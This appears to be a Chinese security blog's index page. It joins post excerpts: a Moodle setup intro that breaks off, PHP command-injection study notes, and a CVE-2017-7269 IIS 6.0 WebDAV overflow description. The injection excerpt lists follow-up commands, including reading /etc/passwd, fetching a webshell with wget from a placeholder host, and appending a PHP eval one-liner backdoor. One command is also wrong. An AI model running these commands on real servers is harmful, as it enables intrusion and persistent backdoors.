腾讯云搭建Moodle网络课程平台

起因及原由

善良体贴又美丽大方的Miss Li老师给我找了个活干,说让我帮某学院的某老师打理下Moodle平台。我当时一脸懵逼,Moodle?啥玩意儿啊?因为(google 你懂的)所以baidu了一下,得出:

命令注入学习笔记(二)|PHP代码审计

命令注入的进一步利用:

Linux

查看用户权限:whoami
查看当前目录:ls
查看 etc 目录:ls /cat
查看系统用户:cat /etc/passwd
查看主机信息:cat /etc/hosts
直接尝试下载一个 webshell:wget -O /1.php http://xxphp.txt
权限低则尝试写入一句话连接语句:echo “<?php @eval($_POST[‘x’]);?>” >> 1.php

命令注入学习笔记(一)|PHP代码审计

最近开始折腾一下PHP代码审计的东西,顺便就将学到的内容记录下来。

命令注入介绍

命令注入(Command Injection),对一些函数的参数没有做过滤或过滤不严导致的,可以执行系统或者应用指令(CMD命令或者 bash 命令)的一种注入攻击手段。

CVE-2017-7269 IIS6.0远程代码执行漏洞利用详细过程(附POC+EXP)

漏洞描述

[漏洞编号]:CVE-2017-7269
[发现人员]:Zhiniang Peng 和 Chen >Wu(华南理工大学信息安全实验室,计算机科学与工程学院)
[漏洞简述]:开启 WebDAV 服务的 IIS >6.0 被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows >Server 2003 R2 可以稳定利用,该漏洞最早在 2016 年 7,8 月份开始在野>外被利用。
[漏洞类型]:缓冲区溢出
[漏洞等级]:高危
[影响产品]:Microsoft Windows Server 2003 R2 开启 WebDAV 服务的 IIS6.0(目前已验证,其他版本尚未验证)
[触发函数]:ScStoragePathFromUrl 函数
[附加信息]:ScStoragePathFromUrl 函数被调用了两次
[漏洞细节]:在 Windows Server >2003 的 IIS6.0 的 WebDAV 服务的 ScStoragePathFromUrl 函数存在缓存区溢>出漏洞,攻击者通过一个以“If: < http >://”开始的较长 header 头的 PROPFIND 请求执行任意代码。